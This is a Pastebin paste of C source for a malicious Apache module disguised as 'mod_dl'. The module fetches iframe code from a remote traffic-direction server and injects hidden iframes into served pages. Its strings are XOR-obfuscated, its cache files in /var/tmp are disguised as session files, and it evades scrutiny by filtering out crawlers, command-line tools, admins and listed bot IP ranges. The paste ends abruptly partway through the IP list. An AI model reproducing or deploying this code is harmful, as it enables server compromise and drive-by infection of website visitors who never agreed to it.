Guest User

Untitled

a guest
Jun 8th, 2011
3,314
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #include "apr_general.h"
  2. #include "apr_lib.h"
  3. #include "apr_buckets.h"
  4. #include "apr_strings.h"
  5. #include "ap_config.h"
  6. #include "util_filter.h"
  7. #include "httpd.h"
  8. #include "http_config.h"
  9. #include "http_request.h"
  10. #include "http_core.h"
  11. #include "http_protocol.h"
  12. #include "http_log.h"
  13. #include "http_main.h"
  14. #include "util_script.h"
  15. #include "http_core.h"
  16. #include <string.h>
  17. #include <stdio.h>
  18. #include <ctype.h>
  19. #include <sys/stat.h>
  20. #include <sys/time.h>
  21. #include <sys/types.h>
  22. #include <utmp.h>
  23. #include <fcntl.h>
  24. #include <unistd.h>
  25. #include <stdlib.h>
  26. #include <pwd.h>
  27. #include <arpa/inet.h>
  28. #include "util_md5.h"
  29. #include <time.h>
  30.  
  31. //#define DEBUG "/var/tmp/lol"
  32.  
  33. #define DO_BAN_SITEKERNEL 0
  34. #define DO_EXPLOIT_ONLY_SEO 0
  35. #define TDS_SID "1"
  36.  
  37. #define TDS_HOST "\x4f\x4c\x40\x42\x4f\x4b\x4c\x50\x57" // "localhost"
  38. #define TDS_URI "\xc\x57\xc" // "\xc\x6a\x45\x51\x42\x4e\x46\x70\x46\x51\x55\x46\x51\x77\x67\x70\xc" // "\xc\x44\x4c\xd\x53\x4b\x53" // "/go.php"
  39. #define TDS_PORT 80
  40. #define TDS_TIMEOUT 10*1000000 // microseconds
  41. #define CRYPT_KEY "#"
  42. #define ROOT_IDLE_TIME 5*60
  43. #define TMP_DIR "\xc\x55\x42\x51\xc\x57\x4e\x53" // "/var/tmp"
  44. #define LIST_PREF "\x50\x46\x50\x50\x7c" // "sess_"
  45. #define DO_CHECK_UTMP 1
  46. #define DO_BAN_SITEADMIN 1
  47. #define CLEAN_MY_NAME "\x4e\x4c\x47\x7c\x47\x4f" // "mod_dl"
  48. #define KEY_COOKIE_NAME "\x73\x6b\x73\x70\x46\x50\x50\x4a\x4c\x4d\x50\x6a\x67\x1e" // "PHPSessionsID="
  49. #define KEY_TTL 5*60 // seconds
  50. #define RAW_COOKIE_VALUE -1
  51. #define CONNECTION_TIMEOUT 30 // seconds
  52. #define TEMP_BAN_TIME 60*60*24*7 // seconds
  53. #define JS_CREATE_IFRAME "\x47\x4c\x40\x56\x4e\x46\x4d\x57\xd\x54\x51\x4a\x57\x46\xb\x4\x1f\x50\x57\x5a\x4f\x46\x1d\xd\x4d\x4c\x47\x4a\x50\x53\x4f\x3\x58\x3\x47\x4a\x50\x53\x4f\x42\x5a\x19\x4d\x4c\x4d\x46\x18\x3\x54\x4a\x47\x57\x4b\x19\x13\x18\x3\x4b\x46\x4a\x44\x4b\x57\x19\x13\x3\x5e\x3\x1f\xc\x50\x57\x5a\x4f\x46\x1d\x4\xa\x18\x2e\x29\x47\x4c\x40\x56\x4e\x46\x4d\x57\xd\x54\x51\x4a\x57\x46\xb\x4\x1f\x4a\x45\x51\x42\x4e\x46\x3\x50\x51\x40\x1e\xc\x1c\x6\x50\x6\x4a\x3\x40\x4f\x42\x50\x50\x1e\x4d\x4c\x47\x4a\x50\x53\x4f\x1d\x1f\xc\x4a\x45\x51\x42\x4e\x46\x1d\x4\xa\x18\x2e\x29" // "document.write('<style>.nodispl { display:none; width:0; height:0 } </style>');\r\ndocument.write('<iframe src=/?%s%i class=nodispl></iframe>');\r\n"
  54.  
  55. #define CACHE_TTL 10*60 // seconds
  56.  
  57. #ifndef UTMP_FILE
  58. #define UTMP_FILE "/var/run/utmp"
  59. #endif
  60.  
  61. module AP_MODULE_DECLARE_DATA dl_module;
  62.  
  63. char *stristr(const char *String, const char *Pattern)
  64. {
  65. char *pptr, *sptr, *start;
  66.  
  67. for (start = (char *)String; *start != '\0'; start++)
  68. {
  69. /* find start of pattern in string */
  70. for ( ; ((*start!='\0') && (toupper(*start) != toupper(*Pattern))); start++)
  71. ;
  72. if ('\0' == *start)
  73. return NULL;
  74.  
  75. pptr = (char *)Pattern;
  76. sptr = (char *)start;
  77.  
  78. while (toupper(*sptr) == toupper(*pptr))
  79. {
  80. sptr++;
  81. pptr++;
  82.  
  83. /* if end of pattern then pattern was found */
  84.  
  85. if ('\0' == *pptr)
  86. return (start);
  87. }
  88. }
  89. return NULL;
  90. }
  91.  
  92. char* dl_ClientIP(ap_filter_t *f)
  93. {
  94. char* x_forwarded_for = (char*) apr_table_get(f->r->headers_in, "X-Forwarded-For");
  95. if (x_forwarded_for != NULL)
  96. {
  97. return x_forwarded_for;
  98. }
  99. else
  100. {
  101. return f->r->connection->remote_ip;
  102. }
  103. }
  104.  
  105. char* decrypt(ap_filter_t *f, char* str)
  106. {
  107. char *result = apr_palloc(f->r->pool, strlen(str) + 1);
  108. if (result != NULL)
  109. {
  110. char *xorkey = CRYPT_KEY;
  111. int i;
  112. for (i=0; i<strlen(str); i++)
  113. result[i] = str[i] ^ xorkey[i % strlen(CRYPT_KEY)];
  114. result[i] = '\0';
  115. return result;
  116. }
  117. else
  118. {
  119. #ifdef DEBUG
  120. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s ALLOC ERROR: decrypt(), %i\r\n", dl_ClientIP(f), strlen(str)+1); fclose(debug_f);
  121. #endif
  122. return NULL;
  123. }
  124. }
  125.  
  126. #define MAX_REFERER_LENGTH 1024
  127.  
  128. typedef struct
  129. {
  130. int modetype;
  131. int key;
  132. time_t time;
  133. char referer1[MAX_REFERER_LENGTH];
  134. char referer2[MAX_REFERER_LENGTH];
  135. } dl_Mode;
  136.  
  137. char from_hex(char ch) {
  138. return isdigit(ch) ? ch - '0' : tolower(ch) - 'a' + 10;
  139. }
  140.  
  141. char to_hex(char code)
  142. {
  143. static char hex[] = "0123456789abcdef";
  144. return hex[code & 15];
  145. }
  146.  
  147. char *urlencode(ap_filter_t* f, char *str)
  148. {
  149. char *buf = apr_palloc(f->r->pool, strlen(str) * 3 + 1);
  150. if (buf != NULL)
  151. {
  152. char *pstr = str, *pbuf = buf;
  153. while (*pstr)
  154. {
  155. if (isalnum(*pstr) || *pstr == '-' || *pstr == '_' || *pstr == '.' || *pstr == '~')
  156. *pbuf++ = *pstr;
  157. else if (*pstr == ' ')
  158. *pbuf++ = '+';
  159. else
  160. *pbuf++ = '%', *pbuf++ = to_hex(*pstr >> 4), *pbuf++ = to_hex(*pstr & 15);
  161. pstr++;
  162. }
  163. *pbuf = '\0';
  164. return buf;
  165. }
  166. else
  167. {
  168. #ifdef DEBUG
  169. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s ALLOC ERROR: urlencode(), %i\r\n", dl_ClientIP(f), strlen(str) * 3 + 1); fclose(debug_f);
  170. #endif
  171. return NULL;
  172. }
  173. }
  174.  
  175. int dl_GetClientKey(ap_filter_t *f)
  176. {
  177. int ClientKey;
  178. char* cookies_str = (char*) apr_table_get(f->r->headers_in, "Cookie");
  179. char tmp_str[16];
  180. memset(tmp_str, 0, sizeof(tmp_str));
  181. if (cookies_str != NULL)
  182. {
  183. char* cookie_begin = strstr(cookies_str, decrypt(f, KEY_COOKIE_NAME));
  184. if (cookie_begin != NULL)
  185. {
  186. cookie_begin += strlen(decrypt(f, KEY_COOKIE_NAME));
  187. char* cookie_end = strstr(cookie_begin, ";");
  188. if (cookie_end == NULL)
  189. {
  190. memcpy(tmp_str, cookie_begin, min(strlen(cookie_begin), sizeof(tmp_str)-1));
  191. }
  192. else
  193. {
  194. memcpy(tmp_str, cookie_begin, min(cookie_end - cookie_begin, sizeof(tmp_str)-1));
  195. }
  196. ClientKey = atoi(tmp_str);
  197. } else { ClientKey = 0; }
  198. } else { ClientKey = 0; }
  199. return ClientKey;
  200. }
  201.  
  202. int dl_check_Raw(ap_filter_t *f)
  203. {
  204. int ClientKey = dl_GetClientKey(f);
  205. if (ClientKey == RAW_COOKIE_VALUE)
  206. {
  207. return 0;
  208. }
  209. return 1;
  210. }
  211.  
  212. int genKey()
  213. {
  214. struct timeval now;
  215. gettimeofday(&now, NULL);
  216. srand(now.tv_usec);
  217. int r = rand();
  218. return abs(r);
  219. }
  220.  
  221. char* dl_genFilenameBlacklist(ap_filter_t *f)
  222. {
  223. char *md5buf = ap_md5(f->r->pool, dl_ClientIP(f));
  224. char *filename = (char*) apr_palloc(f->r->pool, 128);
  225. if (md5buf != NULL && filename != NULL)
  226. {
  227. sprintf(filename, "%s/%s%s", decrypt(f, TMP_DIR), decrypt(f, LIST_PREF), md5buf);
  228. return filename;
  229. }
  230. else
  231. {
  232. #ifdef DEBUG
  233. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s ALLOC ERROR: dl_genFilenameBlacklist(), md5, 128\r\n", dl_ClientIP(f)); fclose(debug_f);
  234. #endif
  235. return NULL;
  236. }
  237. }
  238.  
  239. char* dl_genFilenameSession(ap_filter_t *f)
  240. {
  241. char *md5buf = ap_md5(f->r->pool, dl_ClientIP(f));
  242. char *md5md5buf = ap_md5(f->r->pool, md5buf);
  243. char *filename = (char*) apr_palloc(f->r->pool, 128);
  244. if (md5buf != NULL && md5md5buf != NULL && filename != NULL)
  245. {
  246. sprintf(filename, "%s/%s%s", decrypt(f, TMP_DIR), decrypt(f, LIST_PREF), md5md5buf);
  247. return filename;
  248. }
  249. else
  250. {
  251. #ifdef DEBUG
  252. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s ALLOC ERROR: dl_genFilenameSession(), md5, md5, 128\r\n", dl_ClientIP(f)); fclose(debug_f);
  253. #endif
  254. return NULL;
  255. }
  256. }
  257.  
  258. char* dl_genFilenameTempBanlist(ap_filter_t *f)
  259. {
  260. char *md5buf = ap_md5(f->r->pool, dl_ClientIP(f));
  261. char *md5md5buf = ap_md5(f->r->pool, md5buf);
  262. char *md5md5md5buf = ap_md5(f->r->pool, md5md5buf);
  263. char *filename = (char*) apr_palloc(f->r->pool, 128);
  264. if (md5buf != NULL && md5md5buf != NULL && md5md5md5buf != NULL && filename != NULL)
  265. {
  266. sprintf(filename, "%s/%s%s", decrypt(f, TMP_DIR), decrypt(f, LIST_PREF), md5md5md5buf);
  267. return filename;
  268. }
  269. else
  270. {
  271. #ifdef DEBUG
  272. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s ALLOC ERROR: dl_genFilenameTempBanlist(), md5, md5, md5, 128\r\n", dl_ClientIP(f)); fclose(debug_f);
  273. #endif
  274. return NULL;
  275. }
  276. }
  277.  
  278. char* dl_genFilenameCache(ap_filter_t *f)
  279. {
  280. char *buf = ap_md5(f->r->pool, "cache");
  281. char *filename = (char*) apr_palloc(f->r->pool, 128);
  282. if (buf != NULL && filename != NULL)
  283. {
  284. sprintf(filename, "%s/%s%s", decrypt(f, TMP_DIR), decrypt(f, LIST_PREF), buf);
  285. return filename;
  286. }
  287. else
  288. {
  289. #ifdef DEBUG
  290. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s ALLOC ERROR: dl_genFilenameCache(), md5, 128\r\n", dl_ClientIP(f)); fclose(debug_f);
  291. #endif
  292. return NULL;
  293. }
  294. }
  295.  
  296. void dl_SaveSession(ap_filter_t *f, dl_Mode *mode)
  297. {
  298. FILE* fp;
  299. char *session_filename = dl_genFilenameSession(f);
  300. if (fp = fopen(session_filename, "w"))
  301. {
  302. fprintf(fp, "%i\r\n%i\r\n%i\r\n%s\r\n%s\r\n", mode->modetype, mode->key, mode->time, mode->referer1, mode->referer2);
  303. fclose(fp);
  304. }
  305. }
  306.  
  307. void dl_LoadSession(ap_filter_t *f, dl_Mode *mode)
  308. {
  309. memset(mode, 0, sizeof(dl_Mode));
  310. FILE* fp;
  311. char *session_filename = dl_genFilenameSession(f);
  312. if (fp = fopen(session_filename, "r"))
  313. {
  314. char tmp_str[1000];
  315. memset(tmp_str, 0, sizeof(tmp_str));
  316. fgets(tmp_str, sizeof(tmp_str)-1, fp); mode->modetype = atoi(tmp_str);
  317. fgets(tmp_str, sizeof(tmp_str)-1, fp); mode->key = atoi(tmp_str);
  318. fgets(tmp_str, sizeof(tmp_str)-1, fp); mode->time = atoi(tmp_str);
  319. fgets(tmp_str, sizeof(tmp_str)-1, fp); memcpy(mode->referer1, tmp_str, strlen(tmp_str)-2);
  320. fgets(tmp_str, sizeof(tmp_str)-1, fp); memcpy(mode->referer2, tmp_str, strlen(tmp_str)-2);
  321. fclose(fp);
  322. }
  323. if (mode->modetype == 0 || (time(NULL) - mode->time) > (KEY_TTL + CONNECTION_TIMEOUT))
  324. {
  325. mode->modetype = 1;
  326. mode->key = 0;
  327. mode->time = time(NULL);
  328. memset(mode->referer1, 0, sizeof(mode->referer1));
  329. memset(mode->referer2, 0, sizeof(mode->referer2));
  330. }
  331. }
  332.  
  333. void dl_DeleteSession(ap_filter_t *f)
  334. {
  335. remove(dl_genFilenameSession(f));
  336. }
  337.  
  338. int dl_check_LocalBlacklist(ap_filter_t *f)
  339. {
  340. char* filename = dl_genFilenameBlacklist(f);
  341. apr_file_t *fp;
  342. apr_status_t res = apr_file_open(&fp, filename, APR_READ, APR_OS_DEFAULT, f->r->pool);
  343.  
  344. if (res == APR_ENOENT)
  345. {
  346. #ifdef DEBUG
  347. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Check blacklist IP=%s, filename=%s - file absent, OK\r\n", dl_ClientIP(f), dl_ClientIP(f), filename); fclose(debug_f);
  348. #endif
  349. return 1;
  350. }
  351.  
  352. #ifdef DEBUG
  353. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Check blacklist IP=%s, filename=%s - FILE FOUND! BANNED\r\n", dl_ClientIP(f), dl_ClientIP(f), filename); fclose(debug_f);
  354. #endif
  355.  
  356. apr_file_close(fp);
  357. return 0;
  358. }
  359.  
  360. int dl_check_TempBanlist(ap_filter_t *f)
  361. {
  362. char* filename = dl_genFilenameTempBanlist(f);
  363. FILE* fp = fopen(filename, "r");
  364.  
  365. if (!fp)
  366. {
  367. #ifdef DEBUG
  368. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Check temp banlist IP=%s, filename=%s - file absent, OK\r\n", dl_ClientIP(f), dl_ClientIP(f), filename); fclose(debug_f);
  369. #endif
  370. return 1;
  371. }
  372.  
  373. char tmp_str[16];
  374. memset(tmp_str, 0, sizeof(tmp_str));
  375. fgets(tmp_str, sizeof(tmp_str) - 1, fp);
  376. fclose(fp);
  377. int bantime = atoi(tmp_str);
  378. if (time(NULL)-bantime > TEMP_BAN_TIME)
  379. {
  380. #ifdef DEBUG
  381. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Check temp banlist IP=%s, filename=%s - file found, but bantime is old, unbanned OK\r\n", dl_ClientIP(f), dl_ClientIP(f), filename); fclose(debug_f);
  382. #endif
  383. return 1;
  384. }
  385. else
  386. {
  387. #ifdef DEBUG
  388. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Check temp banlist IP=%s, filename=%s - FILE FOUND! BANNED\r\n", dl_ClientIP(f), dl_ClientIP(f), filename); fclose(debug_f);
  389. #endif
  390. return 0;
  391. }
  392. }
  393.  
  394. void dl_SendIPToLocalBlacklist(ap_filter_t *f)
  395. {
  396. char *filename = dl_genFilenameBlacklist(f);
  397.  
  398. #ifdef DEBUG
  399. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Adding to local blacklist IP=%s, filename=%s\r\n", dl_ClientIP(f), dl_ClientIP(f), filename); fclose(debug_f);
  400. #endif
  401.  
  402. FILE* fd;
  403. fd = fopen(filename, "w");
  404. if (fd != NULL)
  405. {
  406. fclose(fd);
  407. }
  408. }
  409.  
  410. void dl_SendIPToTempBanlist(ap_filter_t *f)
  411. {
  412. char *filename = dl_genFilenameTempBanlist(f);
  413.  
  414. #ifdef DEBUG
  415. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Adding to temp banlist\r\n", dl_ClientIP(f)); fclose(debug_f);
  416. #endif
  417.  
  418. FILE* fd;
  419. fd = fopen(filename, "w");
  420. if (fd != NULL)
  421. {
  422. fprintf(fd, "%i", time(NULL));
  423. fclose(fd);
  424. }
  425. }
  426.  
  427. char* dl_GetRedirectScript(ap_filter_t *f, dl_Mode* mode) // From Cache Or URL
  428. {
  429. #ifdef DEBUG
  430. FILE* debug_f;
  431. #endif
  432.  
  433. if (!dl_check_TempBanlist(f)) { return NULL; }
  434. dl_SendIPToTempBanlist(f);
  435.  
  436. int CacheNeedUpdate = 0;
  437.  
  438. char *cache_html = NULL;
  439. char* out_str;
  440.  
  441. char* cache_filename = dl_genFilenameCache(f);
  442. FILE* cache_file = fopen(cache_filename, "r");
  443. if (cache_file == NULL)
  444. {
  445. #ifdef DEBUG
  446. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Cache file %s not found. Need update\r\n", dl_ClientIP(f), cache_filename); fclose(debug_f);
  447. #endif
  448. CacheNeedUpdate = 1;
  449. }
  450. else
  451. {
  452. fseek(cache_file, 0, SEEK_END);
  453. int fsize = ftell(cache_file);
  454. fseek(cache_file, 0, SEEK_SET);
  455. char* tmp_str = apr_palloc(f->r->pool, sizeof(char)*(fsize+1));
  456.  
  457. #ifdef DEBUG
  458. if (tmp_str == NULL)
  459. {
  460. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s ALLOC ERROR: dl_GetRedirectScript() char* tmp_str = apr_palloc(%i)\r\n", dl_ClientIP(f), sizeof(char)*(fsize+1)); fclose(debug_f);
  461. }
  462. #endif
  463.  
  464. memset(tmp_str, 0, sizeof(char)*(fsize+1));
  465. fread(tmp_str, 1, fsize, cache_file);
  466. fclose(cache_file);
  467.  
  468. char* cache = decrypt(f, tmp_str);
  469. char* razd = strstr(cache, "\r\n");
  470. #define MAX_TIMESTR_SIZE 20
  471. if ((razd != NULL) && (razd - cache < MAX_TIMESTR_SIZE - 1))
  472. {
  473. char time_str[MAX_TIMESTR_SIZE];
  474. memset(time_str, 0, sizeof(time_str));
  475. memcpy(time_str, cache, razd - cache);
  476. int cache_time = atoi(time_str);
  477. int cache_html_size = strlen(cache) - (razd - cache + 2);
  478. cache_html = apr_palloc(f->r->pool, cache_html_size+1);
  479.  
  480. #ifdef DEBUG
  481. if (cache_html == NULL)
  482. {
  483. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s ALLOC ERROR: dl_GetRedirectScript() cache_html = apr_palloc(%i)\r\n", dl_ClientIP(f), cache_html_size+1); fclose(debug_f);
  484. }
  485. #endif
  486.  
  487. memset(cache_html, 0, cache_html_size+1);
  488. memcpy(cache_html, razd + 2, cache_html_size);
  489.  
  490. if (time(NULL) - cache_time > CACHE_TTL)
  491. {
  492. #ifdef DEBUG
  493. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Cache is too old. Need update\r\n", dl_ClientIP(f)); fclose(debug_f);
  494. #endif
  495. CacheNeedUpdate = 1;
  496. }
  497. else
  498. {
  499. #ifdef DEBUG
  500. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Cache is OK. iframe code: %s, cache_time=%i, current_time=%i\r\n", dl_ClientIP(f), cache_html, cache_time, time(NULL)); fclose(debug_f);
  501. #endif
  502. return cache_html;
  503. }
  504. }
  505. else // incorrect format of cache
  506. {
  507. #ifdef DEBUG
  508. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Incorrect format of cache. Need update, fsize: %i, tmp_str: %s, cache: %s, cache(addr) = %i, razd = %i\r\n", dl_ClientIP(f), fsize, tmp_str, cache, cache, razd); fclose(debug_f);
  509. #endif
  510. CacheNeedUpdate = 1;
  511. }
  512. }
  513.  
  514. // if we are here then CacheNeedUpdate == 1 anyway
  515.  
  516. apr_sockaddr_t *sa;
  517. apr_socket_t *s;
  518. if (apr_sockaddr_info_get(&sa, decrypt(f, TDS_HOST), APR_INET, TDS_PORT, 0, f->r->pool) != APR_SUCCESS)
  519. {
  520. #ifdef DEBUG
  521. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s apr_sockaddr_info_get (%s) FAILED!\r\n", dl_ClientIP(f), decrypt(f, TDS_HOST)); fclose(debug_f);
  522. #endif
  523. goto UPDATE_UNSUCCESSFULL;
  524. }
  525. #ifdef DEBUG
  526. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s hostname:%s, servname:%s, port:%i, family:%i\r\n", dl_ClientIP(f), sa->hostname, sa->servname, sa->port, sa->family); fclose(debug_f);
  527. #endif
  528. if (apr_socket_create(&s, sa->family, SOCK_STREAM, APR_PROTO_TCP, f->r->pool) != APR_SUCCESS)
  529. {
  530. #ifdef DEBUG
  531. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s apr_socket_create() to %s FAILED!\r\n", dl_ClientIP(f), decrypt(f, TDS_HOST)); fclose(debug_f);
  532. #endif
  533. goto UPDATE_UNSUCCESSFULL;
  534. }
  535. apr_socket_opt_set(s, APR_SO_NONBLOCK, 1);
  536. apr_socket_timeout_set(s, TDS_TIMEOUT);
  537. int res;
  538. if ((res = apr_socket_connect(s, sa)) != APR_SUCCESS)
  539. {
  540. char err[1024];
  541. memset(err, 0, sizeof(err));
  542. #ifdef DEBUG
  543. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s apr_socket_connect() to %s, res = %i, err = %s FAILED!\r\n", dl_ClientIP(f), decrypt(f, TDS_HOST), res, apr_strerror(res, err, sizeof(err)-1)); fclose(debug_f);
  544. #endif
  545. goto UPDATE_UNSUCCESSFULL;
  546. }
  547. apr_socket_opt_set(s, APR_SO_NONBLOCK, 1);
  548. apr_socket_timeout_set(s, CONNECTION_TIMEOUT);
  549.  
  550. const char *request = apr_pstrcat(f->r->pool, "GET ", decrypt(f, TDS_URI) ,"?sid=", TDS_SID, /*"&format=apache&sIP=", dl_ClientIP(f), "&sUA=", urlencode(f, (char*) apr_table_get(f->r->headers_in, "User-Agent")), "&referer1=", urlencode(f, mode->referer1), "&referer2=", urlencode(f, mode->referer2),*/ " HTTP/1.1\r\n", "Host: ", decrypt(f, TDS_HOST), "\r\n", "\r\n",NULL);
  551. apr_size_t request_len = strlen(request);
  552. #ifdef DEBUG
  553. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "Sending tds-request = %s\r\n", request); fclose(debug_f);
  554. #endif
  555.  
  556. if (apr_socket_send(s, request, &request_len) != APR_SUCCESS)
  557. {
  558. #ifdef DEBUG
  559. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s apr_socket_send() to %s FAILED!\r\n", dl_ClientIP(f), decrypt(f, TDS_HOST)); fclose(debug_f);
  560. #endif
  561. goto UPDATE_UNSUCCESSFULL;
  562. }
  563.  
  564. #define ANSWER_SIZE 4096
  565. char answer[ANSWER_SIZE];
  566. memset(answer, 0, sizeof(answer));
  567. int answer_length = 0;
  568.  
  569. #define BUF_SIZE 1024
  570. #define BEGIN_SHIT "{{{"
  571. #define END_SHIT "}}}"
  572. while (strlen(answer) < ANSWER_SIZE - 1)
  573. {
  574. apr_size_t len = min(BUF_SIZE - 1, ANSWER_SIZE - answer_length - 1);
  575. apr_status_t rv = apr_socket_recv(s, answer + answer_length, &len);
  576. answer_length += len;
  577.  
  578. #ifdef DEBUG
  579. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s answer = %s, last readed len = %i\r\n", dl_ClientIP(f), answer, len); fclose(debug_f);
  580. #endif
  581.  
  582. if (rv == APR_EOF)
  583. {
  584. break;
  585. }
  586.  
  587. if (answer != NULL && strstr(answer, END_SHIT) != NULL)
  588. {
  589. break;
  590. }
  591.  
  592. if (len == 0)
  593. {
  594. usleep(300000);
  595. }
  596. }
  597. apr_socket_close(s);
  598.  
  599. char* from;
  600. char* to;
  601. char* iframe_code;
  602. int iframe_code_length;
  603.  
  604. if (answer != NULL && (from = strstr(answer, BEGIN_SHIT)) && (to = strstr(answer, END_SHIT)))
  605. {
  606. iframe_code_length = to - from - strlen(BEGIN_SHIT);
  607. iframe_code = (char*) apr_palloc(f->r->pool, iframe_code_length);
  608.  
  609. if (iframe_code == NULL)
  610. {
  611. #ifdef DEBUG
  612. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s ALLOC ERROR: dl_GetRedirectScript() iframe_code = apr_palloc(%i)\r\n", dl_ClientIP(f), iframe_code_length); fclose(debug_f);
  613. #endif
  614. goto UPDATE_UNSUCCESSFULL;
  615. }
  616.  
  617. memcpy(iframe_code, from + strlen(BEGIN_SHIT), iframe_code_length);
  618. memset(iframe_code + iframe_code_length, 0, 1);
  619. }
  620. else
  621. {
  622. goto UPDATE_UNSUCCESSFULL;
  623. }
  624.  
  625. // UPDATE SUCCESSFULL:
  626.  
  627. out_str = (char*) apr_palloc(f->r->pool, iframe_code_length + 40);
  628. if (out_str == NULL)
  629. {
  630. #ifdef DEBUG
  631. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s ALLOC ERROR: dl_GetRedirectScript() out_str = apr_palloc(%i)\r\n", dl_ClientIP(f), iframe_code_length + 40); fclose(debug_f);
  632. #endif
  633. return NULL;
  634. }
  635. sprintf(out_str, "%i\r\n%s", time(NULL), iframe_code);
  636. cache_file = fopen(cache_filename, "w");
  637. if (cache_file != NULL)
  638. {
  639. fprintf(cache_file, decrypt(f, out_str));
  640. fclose(cache_file);
  641. }
  642. return iframe_code;
  643.  
  644. UPDATE_UNSUCCESSFULL:
  645.  
  646. out_str = (char*) apr_palloc(f->r->pool, strlen(cache_html) + 40);
  647. if (out_str == NULL)
  648. {
  649. #ifdef DEBUG
  650. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s ALLOC ERROR: dl_GetRedirectScript() out_str = apr_palloc(%i)\r\n", dl_ClientIP(f), strlen(cache_html) + 40); fclose(debug_f);
  651. #endif
  652. return NULL;
  653. }
  654. sprintf(out_str, "%i\r\n%s", time(NULL), cache_html);
  655. cache_file = fopen(cache_filename, "w");
  656. if (cache_file != NULL)
  657. {
  658. fprintf(cache_file, decrypt(f, out_str));
  659. fclose(cache_file);
  660. }
  661. return cache_html;
  662. }
  663.  
  664. int dl_check_BotUserAgent(ap_filter_t *f)
  665. {
  666. const char* ban_useragent[] = { "GOOGLEBOT", "SLURP", "YAHOO", "LINUX", "MACINTOSH", "MAC OS", "IPHONE", "PLAYSTATION", "OPERA MINI", "NINTENDO", "YANDEX", "CRAWLER", "ROBOT", "WORDPRESS", "VBSEO", "BAIDUSPIDER", "FOLLOWSITE", "SOGOU", "NHN", "WGET", "MSNBOT", "YOUDAO", "STACKRAMBLER", "LWP::SIMPLE", "QIHOOBOT", "SOSOSPIDER", "BRUTUS", "HTTPCLIENT", "CURL", "PHP", "INDY LIBRARY" };
  667. char* useragent = (char*) apr_table_get(f->r->headers_in, "User-Agent");
  668. #ifdef DEBUG
  669. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Begin check User-Agent: %s\r\n", dl_ClientIP(f), useragent); fclose(debug_f);
  670. #endif
  671.  
  672. if (!useragent)
  673. return 0;
  674. int i, j, k;
  675. int len_ua = strlen(useragent);
  676. for (i = 0; i < sizeof(ban_useragent)/sizeof(char*); i++)
  677. {
  678. int len_ban = strlen(ban_useragent[i]);
  679. for (j = 0; j < len_ua - len_ban; j++)
  680. {
  681. int match = 1;
  682. for (k = 0; k < len_ban; k++)
  683. {
  684. if (toupper(useragent[j+k]) != ban_useragent[i][k])
  685. {
  686. match = 0;
  687. break;
  688. }
  689. }
  690. if (match == 1)
  691. {
  692. #ifdef DEBUG
  693. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Bot User-Agent detected: %s\r\n", dl_ClientIP(f), ban_useragent[i]); fclose(debug_f);
  694. #endif
  695.  
  696. return 0;
  697. }
  698. }
  699. }
  700. #ifdef DEBUG
  701. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s End check User-Agent OK\r\n", dl_ClientIP(f)); fclose(debug_f);
  702. #endif
  703. return 1;
  704. }
  705.  
  706. int min(int a, int b) { return (a < b ? a : b); }
  707.  
  708. int max(int a, int b) { return (a > b ? a : b); }
  709.  
  710. unsigned long ip2long (str) char *str;
  711. {
  712. unsigned long i, octet, ip = 0;
  713. char *cp, arg[256];
  714. strncpy (arg, str, sizeof(arg)-1);
  715. arg[sizeof(arg)-1] = '\0';
  716. cp = strtok (arg, ".");
  717. for (i=4; i>0; i--)
  718. {
  719. octet = 0;
  720. while (*cp)
  721. {
  722. octet = octet*10 + *cp-'0';
  723. cp++;
  724. }
  725. ip += octet*(1<<((i-1)*8));
  726. cp = strtok (NULL, ".");
  727. }
  728. return ip;
  729. }
  730.  
  731. int dl_check_BotIp(ap_filter_t *f)
  732. {
  733. const long bot_ip[][2] = {{-655417344,-655409153},{1089052672,1089060863},{1123631104,1123639295},{1208926208,1208942591},{-782925824,-782893057},{-1379794944,-1379729409},{1249705984,1249771519},{-655417344,-655409153},{1078218752,1078220799},{1113980928,1113985023},{1089052672,1089060863},{1123631104,1123639295},{1208926208,1208942591},{-782925824,-782893057},{-965974848,-965974833},{-1379794944,-1379729409},{-668867184,-668867177},{-668867168,-668867161},{-776377216,-776377089},{-663925936,-663925921},{1078220800,1078222847},{1078214720,1078214783},{1076485568,1076485583},{1249705984,1249771519},{134744064,134744319},{134743040,134743295},{67305984,67306239},{-772300912,-772300897},{1070843976,1070843983},{-772425592,-772425585},{-1504013248,-1504013233},{134623232,134625279},{1083880144,1083880159},{1180247960,1180247967},{1180359496,1180359503},{1180359472,1180359479},{1081896984,1081896991},{-7